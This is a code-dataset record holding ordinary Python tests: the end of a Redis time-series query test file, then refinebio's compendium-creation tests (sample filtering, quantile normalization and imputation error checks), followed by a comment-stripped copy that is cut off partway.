assert [[b'tester1', [[b'name', b'bob'], [b'generation', b'x']],
expected_result]] == actual_result
actual_result = r.execute_command('TS.mrange', start_ts + 1, start_ts + samples_count, 'WITHLABELS',
'AGGREGATION', 'COUNT', 1, 'FILTER', 'generation=x')
try:
assert len(actual_result[0][1]) != 3 or len(actual_result[1][1]) != 3 or len(actual_result[2][1]) == 3
except Exception as ex:
print(str(actual_result))
res = r.execute_command('TS.INFO', 'tester1')
print(str(res))
res = r.execute_command('TS.INFO', 'tester2')
print(str(res))
res = r.execute_command('TS.INFO', 'tester3')
print(str(res))
raise ex
assert len(actual_result[0][1]) == 3
assert len(actual_result[1][1]) == 3
assert len(actual_result[2][1]) == 3
def test_multilabel_filter():
with Env().getClusterConnectionIfNeeded() as r:
assert r.execute_command('TS.CREATE', 'tester1', 'LABELS', 'name', 'bob', 'class', 'middle', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester2', 'LABELS', 'name', 'rudy', 'class', 'junior', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester3', 'LABELS', 'name', 'fabi', 'class', 'top', 'generation', 'x')
assert r.execute_command('TS.ADD', 'tester1', 0, 1) == 0
assert r.execute_command('TS.ADD', 'tester2', 0, 2) == 0
assert r.execute_command('TS.ADD', 'tester3', 0, 3) == 0
actual_result = r.execute_command('TS.mrange', '-', '+', 'WITHLABELS', 'FILTER', 'name=(bob,rudy)')
assert set(item[0] for item in actual_result) == set([b'tester1', b'tester2'])
actual_result = r.execute_command('TS.mrange', 0, '+', 'WITHLABELS', 'FILTER', 'name=(bob,rudy)',
'class!=(middle,top)')
assert actual_result[0][0] == b'tester2'
actual_result = r.execute_command('TS.mget', 'WITHLABELS', 'FILTER', 'name=(bob,rudy)')
assert set(item[0] for item in actual_result) == set([b'tester1', b'tester2'])
actual_result = r.execute_command('TS.mget', 'WITHLABELS', 'FILTER', 'name=(bob,rudy)', 'class!=(middle,top)')
assert actual_result[0][0] == b'tester2'
def test_large_key_value_pairs():
with Env().getClusterConnectionIfNeeded() as r:
number_series = 100
for i in range(0,number_series):
assert r.execute_command('TS.CREATE', 'ts-{}'.format(i), 'LABELS', 'baseAsset', '17049', 'counterAsset', '840', 'source', '1000', 'dataType', 'PRICE_TICK')
kv_label1 = 'baseAsset=(13830,10249,16019,10135,17049,10777,10138,11036,11292,15778,11043,10025,11436,12207,13359,10807,12216,11833,10170,10811,12864,12738,10053,11334,12487,12619,12364,13266,11219,15827,12374,11223,10071,12249,11097,14430,13282,16226,13667,11365,12261,12646,12650,12397,12785,13941,10231,16254,12159,15103)'
kv_label2 = 'counterAsset=(840)'
kv_label3 = 'source=(1000)'
kv_label4 = 'dataType=(PRICE_TICK)'
kv_labels = [kv_label1, kv_label2, kv_label3, kv_label4]
for kv_label in kv_labels:
            res = r.execute_command('TS.MRANGE', '-', '+', 'FILTER', kv_label)
assert len(res) == number_series
def ensure_replies_series_match(env,series_array_1, series_array_2):
for ts in series_array_1:
ts_name = ts[0]
ts_labels =ts[1]
ts_values =ts[2]
for comparison_ts in series_array_2:
comparison_ts_name = comparison_ts[0]
comparison_ts_labels =comparison_ts[1]
comparison_ts_values =comparison_ts[2]
if ts_name == comparison_ts_name:
env.assertEqual(ts_labels,comparison_ts_labels)
env.assertEqual(ts_values,comparison_ts_values)
def test_non_local_data():
env = Env()
with env.getClusterConnectionIfNeeded() as r:
r.execute_command('TS.ADD', '{host1}_metric_1', 1 ,100, 'LABELS', 'metric', 'cpu')
r.execute_command('TS.ADD', '{host1}_metric_2', 2 ,40, 'LABELS', 'metric', 'cpu')
r.execute_command('TS.ADD', '{host1}_metric_1', 2, 95)
r.execute_command('TS.ADD', '{host1}_metric_1', 10, 99)
previous_results = []
for shard in range(0, env.shardsCount):
shard_conn = env.getConnection(shard)
actual_result = shard_conn.execute_command('TS.MRANGE - + FILTER metric=cpu')
env.assertEqual(len(actual_result),2)
for previous_result in previous_results:
ensure_replies_series_match(env,previous_result,actual_result)
previous_results.append(actual_result)
def test_non_local_filtered_data():
env = Env()
with env.getClusterConnectionIfNeeded() as r:
r.execute_command('TS.ADD', '{host1}_metric_1', 1 ,100, 'LABELS', 'metric', 'cpu')
r.execute_command('TS.ADD', '{host1}_metric_2', 2 ,40, 'LABELS', 'metric', 'cpu')
r.execute_command('TS.ADD', '{host1}_metric_1', 2, 95)
r.execute_command('TS.ADD', '{host1}_metric_1', 10, 99)
previous_results = []
for shard in range(0, env.shardsCount):
shard_conn = env.getConnection(shard)
actual_result = shard_conn.execute_command('TS.MRANGE - + FILTER_BY_TS 11 5 25 55 101 18 9 1900 2 FILTER metric=cpu')
env.assertEqual(len(actual_result),2)
for serie in actual_result:
serie_ts = serie[2]
env.assertEqual(len(serie_ts),1)
env.assertEqual(serie_ts[0][0],2)
for previous_result in previous_results:
ensure_replies_series_match(env,previous_result,actual_result)
previous_results.append(actual_result)
def test_non_local_filtered_labels():
env = Env()
with env.getClusterConnectionIfNeeded() as r:
r.execute_command('TS.ADD', '{host1}_metric_1', 1 ,100, 'LABELS', 'metric', 'cpu', '')
r.execute_command('TS.ADD', '{host1}_metric_2', 2 ,40, 'LABELS', 'metric', 'cpu')
r.execute_command('TS.ADD', '{host1}_metric_1', 2, 95)
r.execute_command('TS.ADD', '{host1}_metric_1', 10, 99)
previous_results = []
for shard in range(0, env.shardsCount):
shard_conn = env.getConnection(shard)
actual_result = shard_conn.execute_command('TS.MRANGE - + FILTER_BY_TS 2 SELECTED_LABELS metric FILTER metric=cpu')
env.assertEqual(len(actual_result),2)
for previous_result in previous_results:
ensure_replies_series_match(env,previous_result,actual_result)
previous_results.append(actual_result)
def test_mrange_align():
start_ts = 1511885909
samples_count = 50
with Env(decodeResponses=True).getClusterConnectionIfNeeded() as r:
assert r.execute_command('TS.CREATE', 'tester1', 'LABELS', 'name', 'bob', 'class', 'middle', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester2', 'LABELS', 'name', 'rudy', 'class', 'junior', 'generation', 'x')
assert r.execute_command('TS.CREATE', 'tester3', 'LABELS', 'name', 'fabi', 'class', 'top', 'generation', 'x')
_insert_data(r, 'tester1', start_ts, samples_count, 5)
_insert_data(r, 'tester2', start_ts, samples_count, 15)
_insert_data(r, 'tester3', start_ts, samples_count, 25)
end_ts = start_ts + samples_count
agg_bucket_size = 15
expected_start_result = [
['tester1', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, start_ts)],
['tester2', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, start_ts)],
['tester3', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, start_ts)],
]
expected_end_result = [
['tester1', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, end_ts)],
['tester2', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, end_ts)],
['tester3', [], build_expected_aligned_data(start_ts, start_ts + samples_count, agg_bucket_size, end_ts)],
]
assert expected_start_result == decode_if_needed(sorted(r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'ALIGN', '-',
'AGGREGATION', 'COUNT', agg_bucket_size, 'FILTER', 'generation=x')))
assert expected_end_result == decode_if_needed(sorted(r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'ALIGN', '+',
'AGGREGATION', 'COUNT', agg_bucket_size, 'FILTER', 'generation=x')))
def groupby(data):
result = defaultdict(lambda: 0)
for key, labels, samples in data:
for sample in samples:
result[sample[0]] = max(result[sample[0]], int(sample[1]))
return [[s[0], str(s[1])] for s in result.items()]
expected_groupby_start_result = [['generation=x', [], groupby(expected_start_result)]]
expected_groupby_end_result = [['generation=x', [], groupby(expected_end_result)]]
assert expected_groupby_start_result == decode_if_needed(r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'ALIGN', '-', 'AGGREGATION',
'COUNT', agg_bucket_size, 'FILTER', 'generation=x',
'GROUPBY', 'generation', 'REDUCE', 'max'))
assert expected_groupby_end_result == decode_if_needed(r.execute_command('TS.mrange', start_ts, start_ts + samples_count, 'ALIGN', '+', 'AGGREGATION',
'COUNT', agg_bucket_size, 'FILTER', 'generation=x',
'GROUPBY', 'generation', 'REDUCE', 'max'))
| true
| true
|
1c4234181841813e745a8ada5c9d0aa53e8be2dc
| 24,222
|
py
|
Python
|
workers/data_refinery_workers/processors/test_compendia.py
|
AlexsLemonade/refinebio
|
52f44947f902adedaccf270d5f9dbd56ab47e40a
|
[
"BSD-3-Clause"
] | 106
|
2018-03-05T16:24:47.000Z
|
2022-03-19T19:12:25.000Z
|
workers/data_refinery_workers/processors/test_compendia.py
|
AlexsLemonade/refinebio
|
52f44947f902adedaccf270d5f9dbd56ab47e40a
|
[
"BSD-3-Clause"
] | 1,494
|
2018-02-27T17:02:21.000Z
|
2022-03-24T15:10:30.000Z
|
workers/data_refinery_workers/processors/test_compendia.py
|
AlexsLemonade/refinebio
|
52f44947f902adedaccf270d5f9dbd56ab47e40a
|
[
"BSD-3-Clause"
] | 15
|
2019-02-03T01:34:59.000Z
|
2022-03-29T01:59:13.000Z
|
import copy
import itertools
import json
import math
import os
import random
import zipfile
from typing import Dict
from django.test import TransactionTestCase, tag
import numpy as np
import pandas as pd
from data_refinery_common.enums import PipelineEnum, ProcessorPipeline
from data_refinery_common.models import (
ComputationalResult,
ComputationalResultAnnotation,
ComputedFile,
Dataset,
Experiment,
ExperimentSampleAssociation,
Organism,
Pipeline,
ProcessorJob,
ProcessorJobDatasetAssociation,
Sample,
SampleComputedFileAssociation,
SampleResultAssociation,
)
from data_refinery_workers.processors import create_compendia, utils
from data_refinery_workers.processors.testing_utils import ProcessorJobTestCaseMixin
def create_sample_for_experiment(sample_info: Dict, experiment: Experiment) -> Sample:
result = ComputationalResult()
result.save()
sample = Sample()
sample.accession_code = sample_info["accession_code"]
sample.title = sample_info.get("title", None) or sample_info["accession_code"]
sample.organism = sample_info["organism"]
sample.technology = sample_info["technology"]
sample.save()
sra = SampleResultAssociation()
sra.sample = sample
sra.result = result
sra.save()
esa = ExperimentSampleAssociation()
esa.experiment = experiment
esa.sample = sample
esa.save()
if sample_info.get("filename") is not None:
computed_file = ComputedFile()
computed_file.filename = sample_info["filename"]
computed_file.absolute_file_path = sample_info["data_dir"] + sample_info["filename"]
computed_file.result = result
computed_file.size_in_bytes = 123
computed_file.is_smashable = True
computed_file.save()
assoc = SampleComputedFileAssociation()
assoc.sample = sample
assoc.computed_file = computed_file
assoc.save()
return sample
class CompendiaTestCase(TransactionTestCase, ProcessorJobTestCaseMixin):
@tag("compendia")
def test_create_compendia(self):
DATA_DIR = "/home/user/data_store/PCL/"
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
gallus_gallus = Organism.get_object_for_name("GALLUS_GALLUS", taxonomy_id=1001)
# MICROARRAY TECH
(experiment, _) = Experiment.objects.get_or_create(accession_code="GSE1487313")
experiment.accession_code = "GSE1487313"
experiment.save()
create_sample_for_experiment(
{
"organism": gallus_gallus,
"accession_code": "GSM1487313",
"technology": "MICROARRAY",
"filename": "GSM1487313_liver.PCL",
"data_dir": DATA_DIR,
},
experiment,
)
# Missing sample that will be filtered
create_sample_for_experiment(
{
"organism": gallus_gallus,
"accession_code": "GSM1487222",
"title": "this sample will be filtered",
"technology": "MICROARRAY",
"filename": "GSM1487222_empty.PCL",
"data_dir": DATA_DIR,
},
experiment,
)
# RNASEQ TECH
experiment2 = Experiment()
experiment2.accession_code = "SRP149598"
experiment2.save()
create_sample_for_experiment(
{
"organism": gallus_gallus,
"accession_code": "SRR7250867",
"technology": "RNA-SEQ",
"filename": "SRP149598_gene_lengthScaledTPM.tsv",
"data_dir": DATA_DIR,
},
experiment,
)
dset = Dataset()
dset.data = {
"GSE1487313": ["GSM1487313", "GSM1487222"],
"SRP149598": ["SRR7250867"],
}
dset.scale_by = "NONE"
dset.aggregate_by = "SPECIES"
dset.svd_algorithm = "ARPACK"
dset.quantile_normalize = True
dset.save()
pjda = ProcessorJobDatasetAssociation()
pjda.processor_job = job
pjda.dataset = dset
pjda.save()
final_context = create_compendia.create_compendia(job.id)
# Because one of the samples is filtered out, there will be too few
# remaining samples to smash together, so we expect this job to fail.
self.assertFailed(job, "k must be between 1 and min(A.shape)")
# check that sample with no computed file was skipped
self.assertTrue("GSM1487222" in final_context["filtered_samples"])
self.assertEqual(
final_context["filtered_samples"]["GSM1487222"]["experiment_accession_code"],
"GSE1487313",
)
@tag("compendia")
def test_create_compendia_danio(self):
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
# MICROARRAY TECH
experiment = Experiment()
experiment.accession_code = "GSE1234"
experiment.save()
result = ComputationalResult()
result.save()
qn_target = ComputedFile()
qn_target.filename = "danio_target.tsv"
qn_target.absolute_file_path = "/home/user/data_store/QN/danio_target.tsv"
qn_target.is_qn_target = True
qn_target.size_in_bytes = "12345"
qn_target.sha1 = "aabbccddeeff"
qn_target.result = result
qn_target.save()
danio_rerio = Organism(name="DANIO_RERIO", taxonomy_id=1, qn_target=result)
danio_rerio.save()
cra = ComputationalResultAnnotation()
cra.data = {}
cra.data["organism_id"] = danio_rerio.id
cra.data["is_qn"] = True
cra.result = result
cra.save()
result = ComputationalResult()
result.save()
micros = []
for file in os.listdir("/home/user/data_store/raw/TEST/MICROARRAY/"):
if "microarray.txt" in file:
continue
create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": file,
"technology": "MICROARRAY",
"filename": file,
"data_dir": "/home/user/data_store/raw/TEST/MICROARRAY/",
},
experiment,
)
micros.append(file)
experiment = Experiment()
experiment.accession_code = "GSE5678"
experiment.save()
result = ComputationalResult()
result.save()
rnas = []
for file in os.listdir("/home/user/data_store/raw/TEST/RNASEQ/"):
if "rnaseq.txt" in file:
continue
create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": file,
"technology": "RNA-SEQ",
"filename": file,
"data_dir": "/home/user/data_store/raw/TEST/RNASEQ/",
},
experiment,
)
rnas.append(file)
# Missing sample that will be filtered
sample = create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": "GSM1487222",
"title": "this sample will be filtered",
"technology": "RNA-SEQ",
"filename": None,
},
experiment,
)
rnas.append(sample.accession_code)
dset = Dataset()
dset.data = {"GSE1234": micros, "GSE5678": rnas}
dset.scale_by = "NONE"
dset.aggregate_by = "SPECIES"
dset.svd_algorithm = "ARPACK"
dset.quantile_normalize = True
dset.save()
pjda = ProcessorJobDatasetAssociation()
pjda.processor_job = job
pjda.dataset = dset
pjda.save()
final_context = create_compendia.create_compendia(job.id)
self.assertSucceeded(job)
# Verify result
self.assertEqual(final_context["compendium_result"].result.computedfile_set.count(), 1)
for file in final_context["compendium_result"].result.computedfile_set.all():
self.assertTrue(os.path.exists(file.absolute_file_path))
# test compendium_result
self.assertEqual(final_context["compendium_result"].svd_algorithm, "ARPACK")
self.assertEqual(
final_context["compendium_result"].primary_organism.name,
final_context["organism_name"],
)
self.assertEqual(final_context["compendium_result"].primary_organism.name, "DANIO_RERIO")
self.assertEqual(final_context["compendium_result"].organisms.count(), 1)
self.assertEqual(len(final_context["filtered_samples"]), 10)
# check that sample with no computed file was skipped
self.assertTrue("GSM1487222" in final_context["filtered_samples"])
self.assertEqual(
final_context["filtered_samples"]["GSM1487222"]["experiment_accession_code"], "GSE5678"
)
self.assertIn(
"This sample did not have a processed file",
final_context["filtered_samples"]["GSM1487222"]["reason"],
)
# check that the 9 files with lots of missing measurements were filtered
self.assertEqual(
len(
list(
filter(
lambda x: "less than 50% present values" in x["reason"],
final_context["filtered_samples"].values(),
)
)
),
9,
)
zf = zipfile.ZipFile(
final_context["compendium_result"].result.computedfile_set.first().absolute_file_path
)
with zf.open("aggregated_metadata.json") as f:
metadata = json.load(f)
self.assertFalse(metadata.get("quant_sf_only"))
self.assertEqual(metadata.get("compendium_version"), 1)
# 420 microarray + 420 RNA seq
# -1 that is filtered for a missing file
# -9 that are filtered for having less than 50% present values
self.assertEqual(metadata.get("num_samples"), 830)
self.assertEqual(metadata.get("num_experiments"), 2)
# Make sure the data were quantile normalized
self.assertTrue(metadata.get("quantile_normalized"))
self.assertIn("ks_statistic", final_context)
self.assertIn("ks_pvalue", final_context)
self.assertEqual(final_context["ks_pvalue"], 1.0)
@tag("compendia")
def test_create_compendia_microarray_only(self):
"""
Make sure that we can actually create a compendium with just microarray samples.
"""
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
# MICROARRAY TECH
experiment = Experiment()
experiment.accession_code = "GSE1234"
experiment.save()
result = ComputationalResult()
result.save()
qn_target = ComputedFile()
qn_target.filename = "danio_target.tsv"
qn_target.absolute_file_path = "/home/user/data_store/QN/danio_target.tsv"
qn_target.is_qn_target = True
qn_target.size_in_bytes = "12345"
qn_target.sha1 = "aabbccddeeff"
qn_target.result = result
qn_target.save()
danio_rerio = Organism(name="DANIO_RERIO", taxonomy_id=1, qn_target=result)
danio_rerio.save()
cra = ComputationalResultAnnotation()
cra.data = {}
cra.data["organism_id"] = danio_rerio.id
cra.data["is_qn"] = True
cra.result = result
cra.save()
result = ComputationalResult()
result.save()
micros = []
for file in os.listdir("/home/user/data_store/raw/TEST/MICROARRAY/"):
if "microarray.txt" in file:
continue
create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": file,
"technology": "MICROARRAY",
"filename": file,
"data_dir": "/home/user/data_store/raw/TEST/MICROARRAY/",
},
experiment,
)
micros.append(file)
dset = Dataset()
dset.data = {"GSE1234": micros}
dset.scale_by = "NONE"
dset.aggregate_by = "SPECIES"
dset.svd_algorithm = "ARPACK"
dset.quantile_normalize = True
dset.save()
pjda = ProcessorJobDatasetAssociation()
pjda.processor_job = job
pjda.dataset = dset
pjda.save()
final_context = create_compendia.create_compendia(job.id)
self.assertSucceeded(job)
# Verify result
self.assertEqual(final_context["compendium_result"].result.computedfile_set.count(), 1)
for file in final_context["compendium_result"].result.computedfile_set.all():
self.assertTrue(os.path.exists(file.absolute_file_path))
# test compendium_result
self.assertEqual(final_context["compendium_result"].svd_algorithm, "ARPACK")
self.assertEqual(
final_context["compendium_result"].primary_organism.name,
final_context["organism_name"],
)
self.assertEqual(final_context["compendium_result"].primary_organism.name, "DANIO_RERIO")
self.assertEqual(final_context["compendium_result"].organisms.count(), 1)
zf = zipfile.ZipFile(
final_context["compendium_result"].result.computedfile_set.first().absolute_file_path
)
with zf.open("aggregated_metadata.json") as f:
metadata = json.load(f)
self.assertFalse(metadata.get("quant_sf_only"))
# 420 microarray
self.assertEqual(metadata.get("num_samples"), 420)
self.assertEqual(metadata.get("num_experiments"), 1)
# Make sure the data were quantile normalized
self.assertTrue(metadata.get("quantile_normalized"))
self.assertIn("ks_statistic", final_context)
self.assertIn("ks_pvalue", final_context)
self.assertEqual(final_context["ks_pvalue"], 1.0)
@tag("compendia")
def test_filter_rnaseq_matrix_drop_row_sums(self):
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
samples = list(str(i) for i in range(0, 10))
df = pd.DataFrame(columns=samples)
for i in range(1, 101):
df.loc[str(i)] = {idx: i for idx in samples}
job_context = {"rnaseq_matrix": df, "job": job}
final_job_context = create_compendia._filter_rnaseq_matrix(job_context)
filtered_matrix = final_job_context["filtered_rnaseq_matrix"]
# Make sure that we are getting rid of intermediate results
# appropriately. Because these matrices can be pretty heavy, the input
# should not stick around in the job context like this.
self.assertNotIn("rnaseq_matrix", final_job_context.keys())
# We drop all rows below the 10th percentile in row sum, so we would
# expect to drop rows 1 through 10 that we created above
self.assertEqual(set(filtered_matrix.index), set(str(i) for i in range(11, 101)))
@tag("compendia")
def test_drop_samples(self):
"""Make sure that we drop samples with >50% missing values"""
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
danio_rerio = Organism(name="DANIO_RERIO", taxonomy_id=1)
danio_rerio.save()
experiment = Experiment()
experiment.accession_code = "GSE1234"
experiment.save()
samples = list(str(i) for i in range(0, 10))
for i in samples:
create_sample_for_experiment(
{"organism": danio_rerio, "accession_code": i, "technology": "MICROARRAY"},
experiment,
)
dset = Dataset()
dset.data = {"GSE1234": "ALL"}
dset.scale_by = "NONE"
dset.aggregate_by = "SPECIES"
dset.svd_algorithm = "ARPACK"
dset.quantile_normalize = True
dset.save()
df = pd.DataFrame(columns=samples)
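        # build a deliberate missingness pattern: column "0" keeps ~2/3 of its values, "1" keeps 1/2,
        # "2" only 1/3 and "3" only 1/4, so columns "2" and "3" fall below the 50% present threshold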
for i in range(1, 101):
row_i = {idx: i for idx in samples}
if i % 3 != 0 and i % 3 != 1:
del row_i["0"]
if i % 2 != 0:
del row_i["1"]
if i % 3 != 0:
del row_i["2"]
if i % 4 != 0:
del row_i["3"]
df.loc[str(i)] = row_i
job_context = {
"microarray_matrix": df,
"job": job,
"dataset": dset,
# This key is added in the setup code, so we need to add it ourselves here
"filtered_samples": {},
}
job_context = create_compendia._full_outer_join_gene_matrices(job_context)
final_job_context = create_compendia._filter_rows_and_columns(job_context)
filtered_matrix = final_job_context["row_col_filtered_matrix"]
# Columns 0 and 1 have missing data, but they should still have >= 50%.
# Columns 2 and 3 are both missing >50% though, so they should be filtered.
self.assertEqual(set(filtered_matrix.columns), {"0", "1"} | {str(i) for i in range(4, 10)})
self.assertEqual(set(final_job_context["filtered_samples"].keys()), {"2", "3"})
for v in final_job_context["filtered_samples"].values():
self.assertIn("less than 50% present", v["reason"])
@tag("compendia")
def test_imputation(self):
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
# MICROARRAY TECH
experiment = Experiment()
experiment.accession_code = "GSE1234"
experiment.save()
result = ComputationalResult()
result.save()
qn_target = ComputedFile()
qn_target.filename = "danio_target.tsv"
qn_target.absolute_file_path = "/home/user/data_store/QN/danio_target.tsv"
qn_target.is_qn_target = True
qn_target.size_in_bytes = "12345"
qn_target.sha1 = "aabbccddeeff"
qn_target.result = result
qn_target.save()
danio_rerio = Organism(name="DANIO_RERIO", taxonomy_id=1, qn_target=result)
danio_rerio.save()
cra = ComputationalResultAnnotation()
cra.data = {}
cra.data["organism_id"] = danio_rerio.id
cra.data["is_qn"] = True
cra.result = result
cra.save()
result = ComputationalResult()
result.save()
micros = []
for file in os.listdir("/home/user/data_store/raw/TEST/MICROARRAY/"):
if "microarray.txt" in file:
continue
create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": file,
"technology": "MICROARRAY",
"filename": file,
"data_dir": "/home/user/data_store/raw/TEST/MICROARRAY/",
},
experiment,
)
micros.append(file)
experiment = Experiment()
experiment.accession_code = "GSE5678"
experiment.save()
result = ComputationalResult()
result.save()
rnas = []
for file in os.listdir("/home/user/data_store/raw/TEST/RNASEQ/"):
if "rnaseq.txt" in file:
continue
create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": file,
"technology": "RNA-SEQ",
"filename": file,
"data_dir": "/home/user/data_store/raw/TEST/RNASEQ/",
},
experiment,
)
rnas.append(file)
# Missing sample that will be filtered
sample = create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": "GSM1487222",
"title": "this sample will be filtered",
"technology": "RNA-SEQ",
"filename": None,
},
experiment,
)
rnas.append(sample.accession_code)
dset = Dataset()
dset.data = {"GSE1234": micros, "GSE5678": rnas}
dset.scale_by = "NONE"
dset.aggregate_by = "SPECIES"
dset.svd_algorithm = "ARPACK"
dset.quantile_normalize = True
dset.save()
pjda = ProcessorJobDatasetAssociation()
pjda.processor_job = job
pjda.dataset = dset
pjda.save()
imputation_index = create_compendia.COMPENDIA_PIPELINE.index(
create_compendia._perform_imputation
)
pipeline = Pipeline(name=PipelineEnum.CREATE_COMPENDIA.value)
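        # run every step before imputation once, then reuse the resulting context to run the imputation
        # step twice: once untouched as a baseline and once with values masked out below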
job_context = utils.run_pipeline(
{"job_id": job.id, "pipeline": pipeline},
create_compendia.COMPENDIA_PIPELINE[:imputation_index],
)
# First, run the imputation step without removing anything to get a baseline
expected_context = utils.run_pipeline(
job_context.copy(), [create_compendia.COMPENDIA_PIPELINE[imputation_index]]
)
# Now pick some rows to remove according to the instructions from
# https://github.com/AlexsLemonade/refinebio/pull/2879#issuecomment-895143336
random.seed(42)
# Select some rows randomly and mask a little bit less than 30% of the values
rare_rows = random.sample(list(job_context["microarray_matrix"].index), k=25)
rare_genes = {}
for row in rare_rows:
cols = random.sample(
list(job_context["microarray_matrix"].columns),
# There are around 840 samples, and we want to pick a little bit
# less than 30% of them
k=int(0.28 * 840),
)
rare_genes[row] = cols
for col in cols:
job_context["microarray_matrix"].loc[row, col] = np.nan
# Now randomly select some entries from the other rows to mask
individual_indices = random.sample(
list(
itertools.product(
set(job_context["microarray_matrix"].index) - set(rare_rows),
job_context["microarray_matrix"].columns,
)
),
k=1000,
)
for row, col in individual_indices:
job_context["microarray_matrix"].loc[row, col] = np.nan
final_context = utils.run_pipeline(
job_context, [create_compendia.COMPENDIA_PIPELINE[imputation_index]]
)
self.assertDidNotFail(job)
index = set(final_context["merged_no_qn"].index) & set(
expected_context["merged_no_qn"].index
)
columns = set(final_context["merged_no_qn"].columns) & set(
expected_context["merged_no_qn"].columns
)
# Calculate the Root-Mean-Square Error (RMSE) of the imputed values.
# See https://en.wikipedia.org/wiki/Root-mean-square_deviation
# for a description of the formula.
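        # RMSE = sqrt( sum((imputed - baseline)^2) / N ) over the masked entries that survived row/column filtering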
N = 0
squared_error = 0
affected_entries = {
*individual_indices,
*((row, col) for row, cols in rare_genes.items() for col in cols),
}
for row, col in affected_entries:
if row in index and col in columns:
actual = final_context["merged_no_qn"].loc[row, col]
expected = expected_context["merged_no_qn"].loc[row, col]
N += 1
squared_error += (actual - expected) ** 2
rmse = math.sqrt(squared_error / N)
# The results of a previous run plus a little bit of leeway
self.assertLess(abs(rmse - 0.2868600293662542), 0.05)
| 33.782427
| 99
| 0.592313
|
import copy
import itertools
import json
import math
import os
import random
import zipfile
from typing import Dict
from django.test import TransactionTestCase, tag
import numpy as np
import pandas as pd
from data_refinery_common.enums import PipelineEnum, ProcessorPipeline
from data_refinery_common.models import (
ComputationalResult,
ComputationalResultAnnotation,
ComputedFile,
Dataset,
Experiment,
ExperimentSampleAssociation,
Organism,
Pipeline,
ProcessorJob,
ProcessorJobDatasetAssociation,
Sample,
SampleComputedFileAssociation,
SampleResultAssociation,
)
from data_refinery_workers.processors import create_compendia, utils
from data_refinery_workers.processors.testing_utils import ProcessorJobTestCaseMixin
def create_sample_for_experiment(sample_info: Dict, experiment: Experiment) -> Sample:
result = ComputationalResult()
result.save()
sample = Sample()
sample.accession_code = sample_info["accession_code"]
sample.title = sample_info.get("title", None) or sample_info["accession_code"]
sample.organism = sample_info["organism"]
sample.technology = sample_info["technology"]
sample.save()
sra = SampleResultAssociation()
sra.sample = sample
sra.result = result
sra.save()
esa = ExperimentSampleAssociation()
esa.experiment = experiment
esa.sample = sample
esa.save()
if sample_info.get("filename") is not None:
computed_file = ComputedFile()
computed_file.filename = sample_info["filename"]
computed_file.absolute_file_path = sample_info["data_dir"] + sample_info["filename"]
computed_file.result = result
computed_file.size_in_bytes = 123
computed_file.is_smashable = True
computed_file.save()
assoc = SampleComputedFileAssociation()
assoc.sample = sample
assoc.computed_file = computed_file
assoc.save()
return sample
class CompendiaTestCase(TransactionTestCase, ProcessorJobTestCaseMixin):
@tag("compendia")
def test_create_compendia(self):
DATA_DIR = "/home/user/data_store/PCL/"
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
gallus_gallus = Organism.get_object_for_name("GALLUS_GALLUS", taxonomy_id=1001)
(experiment, _) = Experiment.objects.get_or_create(accession_code="GSE1487313")
experiment.accession_code = "GSE1487313"
experiment.save()
create_sample_for_experiment(
{
"organism": gallus_gallus,
"accession_code": "GSM1487313",
"technology": "MICROARRAY",
"filename": "GSM1487313_liver.PCL",
"data_dir": DATA_DIR,
},
experiment,
)
create_sample_for_experiment(
{
"organism": gallus_gallus,
"accession_code": "GSM1487222",
"title": "this sample will be filtered",
"technology": "MICROARRAY",
"filename": "GSM1487222_empty.PCL",
"data_dir": DATA_DIR,
},
experiment,
)
experiment2 = Experiment()
experiment2.accession_code = "SRP149598"
experiment2.save()
create_sample_for_experiment(
{
"organism": gallus_gallus,
"accession_code": "SRR7250867",
"technology": "RNA-SEQ",
"filename": "SRP149598_gene_lengthScaledTPM.tsv",
"data_dir": DATA_DIR,
},
experiment,
)
dset = Dataset()
dset.data = {
"GSE1487313": ["GSM1487313", "GSM1487222"],
"SRP149598": ["SRR7250867"],
}
dset.scale_by = "NONE"
dset.aggregate_by = "SPECIES"
dset.svd_algorithm = "ARPACK"
dset.quantile_normalize = True
dset.save()
pjda = ProcessorJobDatasetAssociation()
pjda.processor_job = job
pjda.dataset = dset
pjda.save()
final_context = create_compendia.create_compendia(job.id)
self.assertFailed(job, "k must be between 1 and min(A.shape)")
self.assertTrue("GSM1487222" in final_context["filtered_samples"])
self.assertEqual(
final_context["filtered_samples"]["GSM1487222"]["experiment_accession_code"],
"GSE1487313",
)
@tag("compendia")
def test_create_compendia_danio(self):
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
experiment = Experiment()
experiment.accession_code = "GSE1234"
experiment.save()
result = ComputationalResult()
result.save()
qn_target = ComputedFile()
qn_target.filename = "danio_target.tsv"
qn_target.absolute_file_path = "/home/user/data_store/QN/danio_target.tsv"
qn_target.is_qn_target = True
qn_target.size_in_bytes = "12345"
qn_target.sha1 = "aabbccddeeff"
qn_target.result = result
qn_target.save()
